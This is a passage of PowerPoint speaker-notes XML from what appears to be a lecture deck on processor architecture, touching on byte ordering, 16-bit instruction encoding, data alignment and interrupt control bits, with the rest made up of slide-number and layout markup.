              <a:t> by Jonathan Swift. It represents a stupid argument. On April 1, 1980, Danny Cohen published an article comparing this story to the never-ending argument in the computer world about  the byte ordering</a:t>
            </a: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77773E04-9CAA-49B5-AE54-13F186B71825}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>80</a:t>
            </a:fld>
            <a:endParaRPr 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02FD1B2-3FF9-49C0-8E86-B5F74EB30B7A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507"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21508"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21509"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nchor="b"/>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2151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nchor="b"/>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80BD8529-E8F5-4CEB-BA73-01E5D50E5FA4}" type="slidenum">
              <a:rPr lang="en-GB" sz="1200">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1" hangingPunct="1"/>
              <a:t>81</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" sz="1200">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21511" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147763" y="688975"/>
            <a:ext cx="4570412" cy="3427413"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21512" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915525" y="4344358"/>
            <a:ext cx="5026951" cy="4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p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ultiple instructions can be fetched in a single cycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>32-bit instructions can be split up.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1000">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mpiler makes extensive use of the 16-bit instructions.  So, I-cache hit rate is improved, line reload is lower, etc.</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4146BCF-8328-43C1-9DC1-F8271A441ACF}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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B8E1B21C-1FDD-4424-9D63-89F08566F46C}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>82</a:t>
            </a:fld>
            <a:endParaRPr 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B6430BE-92F7-4BE3-9A75-7FC9C1E9D31A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23555" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2355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DDDDFAFB-3828-44A1-8E76-02C4D87E0956}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>83</a:t>
            </a:fld>
            <a:endParaRPr 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smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34820" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D8012381-1383-4CF5-ACE1-06ECEDC9BB88}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</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57ABF8B-9071-4684-863A-FA9DE6F06FD6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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4C4D454-BF7D-453A-902A-3DF47DDBD8E5}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>84</a:t>
            </a:fld>
            <a:endParaRPr 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8239551-DCB4-4394-B7CD-452F50526C61}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2560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729E167D-FA11-4777-9D71-2FF68B5C5E79}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>85</a:t>
            </a:fld>
            <a:endParaRPr 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44F42D-B779-4EC3-946F-9FA7CC7FC410}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26627" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2662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9F6C6DE-1602-4FED-A7F0-9588A50D3488}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>86</a:t>
            </a:fld>
            <a:endParaRPr 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544F298-1360-48AA-A140-D89766B7B5B2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276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Explain the reasoning behind it – so access to field would be aligned</a:t>
            </a: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97140785-1B5E-4BB9-AEA4-299524A1088A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>87</a:t>
            </a:fld>
            <a:endParaRPr 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5F4BDD7-13C2-4E02-B282-EB422590272B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286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F6B9E77E-E317-469D-8866-9C65D6DCC49F}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr 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E8EB06-A2C9-46A5-B73C-5724FF4BDFE2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29699" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297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402EDBA7-1DDA-49E6-95F5-3679E8F217C9}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>89</a:t>
            </a:fld>
            <a:endParaRPr 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64BBAEF3-0BEF-473E-AED0-DEBD766F9626}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30723" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3072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18C56AFA-C9B2-471A-B06F-9A348ED38EAD}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>90</a:t>
            </a:fld>
            <a:endParaRPr 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1DF9820-D1D0-4F97-9AB4-524253B45AFE}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31747" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317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E8899697-02AE-4941-A2F0-180B15CC249D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>91</a:t>
            </a:fld>
            <a:endParaRPr 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67B7E1E-289C-4997-98EB-A9D18CC0422B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32771" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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62F9E5DF-0F3B-432D-9911-3FF0A27C0906}" type="slidenum">
              <a:rPr lang="en-US" sz="1200"/>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr 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80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The peripheral sets the ICR bit when the event occurs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" i="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>even if the interrupt is disabled!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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61B19DCA-640A-459D-BE99-C021B49423B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>130</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="12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4DFD2894-B6FA-4E32-BED5-845F22BF6574}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282627" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4573588" cy="3430588"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282628" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="4344988"/>
            <a:ext cx="5486400" cy="4113212"/>
          </a:xfrm>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12692A49-5462-456D-8B55-630575DC86A3}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>241</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" smtClean="0">
              <a:latin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A743EC86-00ED-4E01-9923-7874FEC69390}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>242</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" smtClean="0">
              <a:latin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80F00D1C-E17B-4193-B1B0-BA5ED5CA3233}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>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9220"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FD96463-2DA3-4539-974E-24D724F51F7E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr algn="r">
                <a:defRPr/>
              </a:pPr>
              <a:t>250</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="+mn-lt"/>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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3112" y="8685783"/>
            <a:ext cx="2975379" cy="461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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="730320" indent="-280892">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1123569" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1572997" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2022424" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2471852" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2921279" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3370707" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3820135" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Konstantin Levit-Gurevich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264195" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3885733" y="8685783"/>
            <a:ext cx="2975379" cy="461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Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="730320" indent="-280892">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1123569" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1572997" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2022424" indent="-224714">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2471852" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2921279" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3370707" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3820135" indent="-224714" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
